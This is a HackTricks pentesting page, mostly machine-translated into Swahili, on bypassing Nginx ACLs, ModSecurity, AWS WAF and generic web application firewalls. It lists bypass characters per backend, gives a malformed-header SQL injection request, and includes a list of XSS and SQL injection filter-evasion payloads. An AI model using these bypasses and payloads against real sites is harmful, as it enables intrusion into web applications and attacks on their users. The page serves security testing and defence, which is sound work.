hacktricks/pentesting-web/proxy-waf-protections-bypass.md

13 KiB
Raw Blame History

Proxy / WAF Protections Bypass

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

{% embed url="https://websec.nl/" %}

Bypass Nginx ACL Rules with Pathname Manipulation

Techniques kutoka utafiti huu.

Nginx rule example:

location = /admin {
deny all;
}

location = /admin/ {
deny all;
}

Ili kuzuia kupita, Nginx inafanya urekebishaji wa njia kabla ya kuangalia. Hata hivyo, ikiwa seva ya nyuma inafanya urekebishaji tofauti (kuondoa wahusika ambao nginx haondoi) inaweza kuwa inawezekana kupita ulinzi huu.

NodeJS - Express

Nginx Version Node.js Bypass Characters
1.22.0 \xA0
1.21.6 \xA0
1.20.2 \xA0, \x09, \x0C
1.18.0 \xA0, \x09, \x0C
1.16.1 \xA0, \x09, \x0C

Flask

Nginx Version Flask Bypass Characters
1.22.0 \x85, \xA0
1.21.6 \x85, \xA0
1.20.2 \x85, \xA0, \x1F, \x1E, \x1D, \x1C, \x0C, \x0B
1.18.0 \x85, \xA0, \x1F, \x1E, \x1D, \x1C, \x0C, \x0B
1.16.1 \x85, \xA0, \x1F, \x1E, \x1D, \x1C, \x0C, \x0B

Spring Boot

Nginx Version Spring Boot Bypass Characters
1.22.0 ;
1.21.6 ;
1.20.2 \x09, ;
1.18.0 \x09, ;
1.16.1 \x09, ;

PHP-FPM

Mipangilio ya Nginx FPM:

location = /admin.php {
deny all;
}

location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php8.1-fpm.sock;
}

Nginx imewekwa ili kuzuia ufikiaji wa /admin.php lakini inawezekana kupita hii kwa kufikia /admin.php/index.php.

Jinsi ya kuzuia

location ~* ^/admin {
deny all;
}

Bypass Mod Security Rules

Path Confusion

Katika chapisho hili inaelezwa kwamba ModSecurity v3 (hadi 3.0.12), ilitekelezwa vibaya REQUEST_FILENAME variable ambayo ilipaswa kuwa na njia iliyofikiwa (hadi mwanzo wa vigezo). Hii ni kwa sababu ilifanya URL decode ili kupata njia.
Hivyo, ombi kama http://example.com/foo%3f';alert(1);foo= katika mod security litadhani kwamba njia ni tu /foo kwa sababu %3f inabadilishwa kuwa ? ikimaliza njia ya URL, lakini kwa kweli njia ambayo seva itapokea itakuwa /foo%3f';alert(1);foo=.

Vigezo REQUEST_BASENAME na PATH_INFO pia vilikumbwa na hitilafu hii.

Kitu kama hicho kilitokea katika toleo la 2 la Mod Security ambayo iliruhusu kupita ulinzi ambao ulizuia mtumiaji kufikia faili zenye extensions maalum zinazohusiana na faili za akiba (kama .bak) kwa kutuma tu dot URL iliyohifadhiwa katika %2e, kwa mfano: https://example.com/backup%2ebak.

Bypass AWS WAF ACL

Malformed Header

Utafiti huu unataja kwamba ilikuwa inawezekana kupita sheria za AWS WAF zilizotumika juu ya vichwa vya HTTP kwa kutuma "malformed" header ambayo haikupaswa kuchambuliwa vizuri na AWS lakini ilifanywa na seva ya nyuma.

Kwa mfano, kutuma ombi lifuatalo lenye SQL injection katika header X-Query:

GET / HTTP/1.1\r\n
Host: target.com\r\n
X-Query: Value\r\n
\t' or '1'='1' -- \r\n
Connection: close\r\n
\r\n

Iliwezekana kupita AWS WAF kwa sababu haingelewa kwamba mstari unaofuata ni sehemu ya thamani ya kichwa wakati seva ya NODEJS ilifanya (hii ilirekebishwa).

Kupita WAF za Kijeni

Mipaka ya Ukubwa wa Ombi

Kwa kawaida WAF zina kikomo fulani cha urefu wa maombi ya kuangalia na ikiwa ombi la POST/PUT/PATCH likipita, WAF haitakagua ombi hilo.

Ukubwa wa juu wa mwili wa ombi la wavuti ambao unaweza kukaguliwa kwa ulinzi wa Application Load Balancer na AWS AppSync8 KB
Ukubwa wa juu wa mwili wa ombi la wavuti ambao unaweza kukaguliwa kwa ulinzi wa CloudFront, API Gateway, Amazon Cognito, App Runner, na Verified Access**64 KB

Firewalls za zamani za Programu za Wavuti zenye Core Rule Set 3.1 (au chini) zinaruhusu ujumbe wenye ukubwa zaidi ya 128 KB kwa kuzima ukaguzi wa mwili wa ombi, lakini ujumbe hizi hazitakaguliwa kwa udhaifu. Kwa toleo jipya (Core Rule Set 3.2 au jipya), jambo sawa linaweza kufanywa kwa kuzima kikomo cha juu cha mwili wa ombi. Wakati ombi linapopita kikomo cha ukubwa:

Ikiwa mode ya kuzuia: Inarekodi na kuzuia ombi.
Ikiwa mode ya kugundua: Inakagua hadi kikomo, inapuuzilia mbali yaliyobaki, na inarekodi ikiwa Content-Length inazidi kikomo.

Kwa kawaida, WAF inakagua tu 8KB za kwanza za ombi. Inaweza kuongeza kikomo hadi 128KB kwa kuongeza Metadata ya Juu.

Hadi 128KB.

Obfuscation

# IIS, ASP Clasic
<%s%cr%u0131pt> == <script>

# Path blacklist bypass - Tomcat
/path1/path2/ == ;/path1;foo/path2;bar/;

Unicode Compatability

Kulingana na utekelezaji wa normalization ya Unicode (maelezo zaidi hapa), wahusika wanaoshiriki ufanisi wa Unicode wanaweza kuwa na uwezo wa kupita WAF na kutekeleza kama mzigo ulio kusudiwa. Wahusika wanaofaa wanaweza kupatikana hapa.

Example

# under the NFKD normalization algorithm, the characters on the left translate
# to the XSS payload on the right
img src⁼p onerror⁼prompt⁽1⁾﹥  --> img src=p onerror='prompt(1)'>

H2C Smuggling

{% content-ref url="h2c-smuggling.md" %} h2c-smuggling.md {% endcontent-ref %}

IP Rotation

Regex Bypasses

Mbinu tofauti zinaweza kutumika kupita vichujio vya regex kwenye moto. Mifano ni pamoja na kubadilisha kesi, kuongeza mapumziko ya mistari, na kuandika payloads. Rasilimali za bypass mbalimbali zinaweza kupatikana kwenye PayloadsAllTheThings na OWASP. Mifano iliyo hapa chini ilitolewa kutoka hiki makala.

<sCrIpT>alert(XSS)</sCriPt> #changing the case of the tag
<<script>alert(XSS)</script> #prepending an additional "<"
<script>alert(XSS) // #removing the closing tag
<script>alert`XSS`</script> #using backticks instead of parenetheses
java%0ascript:alert(1) #using encoded newline characters
<iframe src=http://malicous.com < #double open angle brackets
<STYLE>.classname{background-image:url("javascript:alert(XSS)");}</STYLE> #uncommon tags
<img/src=1/onerror=alert(0)> #bypass space filter by using / where a space is expected
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a> #extra characters
Function("ale"+"rt(1)")(); #using uncommon functions besides alert, console.log, and prompt
javascript:74163166147401571561541571411447514115414516216450615176 #octal encoding
<iframe src="javascript:alert(`xss`)"> #unicode encoding
/?id=1+un/**/ion+sel/**/ect+1,2,3-- #using comments in SQL query to break up statement
new Function`alt\`6\``; #using backticks instead of parentheses
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascript
%26%2397;lert(1) #using HTML encoding
<a src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)"> #Using Line Feed (LF) line breaks
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()> # use any chars that aren't letters, numbers, or encapsulation chars between event handler and equal sign (only works on Gecko engine)

Tools

  • nowafpls: Burp plugin kuongeza data zisizo na maana kwenye maombi ili kupita WAFs kwa urefu

References

{% embed url="https://websec.nl/" %}

{% hint style="success" %} Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}